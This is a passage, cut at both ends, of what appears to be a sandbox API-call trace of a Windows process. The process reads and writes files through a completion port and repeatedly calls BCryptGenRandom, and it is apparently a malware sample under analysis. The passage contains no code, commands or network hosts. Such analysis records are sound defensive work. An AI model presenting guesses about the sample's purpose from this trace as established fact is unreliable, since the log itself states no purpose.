lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.463] ReadFile (in: hFile=0x11a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x701d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0092.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.464] CloseHandle (hObject=0x11a0) returned 1 [0092.465] free (_Block=0x3e30078) [0092.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.523] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x60d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0092.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.525] CloseHandle (hObject=0x1194) returned 1 [0092.525] free (_Block=0x3d70048) [0092.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.587] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x609, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.601] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc57, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0092.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.631] ReadFile (in: hFile=0x11a0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x213d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0092.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.670] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x1fb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0092.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.687] CloseHandle (hObject=0x13d8) returned 1 [0092.688] free (_Block=0x3df0128) [0092.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.689] CloseHandle (hObject=0x13dc) returned 1 [0092.689] free (_Block=0x1ff1e60) [0092.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.863] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0092.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0092.869] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.869] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.869] free (_Block=0x77d800) [0092.870] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.870] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.870] free (_Block=0x2071008) [0092.870] free (_Block=0x2071118) [0092.870] free (_Block=0x77d908) [0092.870] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0092.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.884] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0092.884] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.884] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.884] free (_Block=0x77d800) [0092.884] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.885] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.885] free (_Block=0x2071008) [0092.885] free (_Block=0x2071118) [0092.885] free (_Block=0x77d908) [0092.885] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0092.886] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.907] CloseHandle (hObject=0x13dc) returned 1 [0092.908] free (_Block=0x1ff1e60) [0092.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0092.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0092.946] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.946] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.946] free (_Block=0x77d800) [0092.946] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.946] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.946] free (_Block=0x2071008) [0092.946] free (_Block=0x2071118) [0092.946] free (_Block=0x77d908) [0092.946] WriteFile (in: hFile=0x11a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0092.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.179] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7260, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.255] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x12b9, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.311] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x12cd, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0093.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.325] CloseHandle (hObject=0x13d8) returned 1 [0093.325] free (_Block=0x3df0008) [0093.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.326] WriteFile (in: hFile=0x1194, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x1aaf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0093.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.380] ReadFile (in: hFile=0x13e0, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0x18337, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 1 [0093.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.427] WriteFile (in: hFile=0x1194, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.457] ReadFile (in: hFile=0x13d8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x658e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0093.498] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0093.510] ReadFile (in: hFile=0x11a0, lpBuffer=0x3ef01fc, nNumberOfBytesToRead=0xef24, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef01c8 | out: lpBuffer=0x3ef01fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef01c8) returned 0x0 [0093.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0095.288] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xef24, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0095.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0095.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0095.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0095.349] calloc (_Count=0x40, _Size=0x4) returned 0x3ef0008 [0095.349] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0095.349] free (_Block=0x3ef0008) [0095.349] calloc (_Count=0x41, _Size=0x4) returned 0x3ef0008 [0095.349] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0095.350] free (_Block=0x3ef0008) [0095.350] free (_Block=0x2071818) [0095.350] free (_Block=0x77d800) [0095.350] WriteFile (in: hFile=0x334, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0095.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0100.962] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0100.969] WriteFile (in: hFile=0x3b4, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0100.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.001] CloseHandle (hObject=0x1194) returned 1 [0101.008] free (_Block=0x3ef0008) [0101.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.087] ReadFile (in: hFile=0x13e0, lpBuffer=0x3e301cc, nNumberOfBytesToRead=0x319e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198) returned 1 [0101.121] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.121] CloseHandle (hObject=0x13e0) returned 1 [0101.128] free (_Block=0x3e30198) [0101.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.166] ReadFile (in: hFile=0x334, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x2e73, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0101.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0101.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0101.192] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.192] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.192] free (_Block=0x77d800) [0101.192] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.192] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.193] free (_Block=0x2071818) [0101.193] free (_Block=0x2071928) [0101.193] free (_Block=0x77d908) [0101.193] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.229] CloseHandle (hObject=0x13e4) returned 1 [0101.232] free (_Block=0x1ff1e60) [0101.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.233] WriteFile (in: hFile=0xa50, lpBuffer=0x3e3003c*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 1 [0101.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.267] ReadFile (in: hFile=0x334, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x30c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0101.282] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.283] CloseHandle (hObject=0x334) returned 1 [0101.297] free (_Block=0x3d70048) [0101.297] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0101.306] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0101.309] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.309] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.309] free (_Block=0x77d800) [0101.309] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.309] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.310] free (_Block=0x2071818) [0101.310] free (_Block=0x2071928) [0101.310] free (_Block=0x77d908) [0101.310] WriteFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.332] CloseHandle (hObject=0xa50) returned 1 [0101.336] free (_Block=0x1ff1e60) [0101.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.355] CloseHandle (hObject=0x13e4) returned 1 [0101.361] free (_Block=0x3e30008) [0101.361] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.375] ReadFile (in: hFile=0xa54, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x3bcc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, 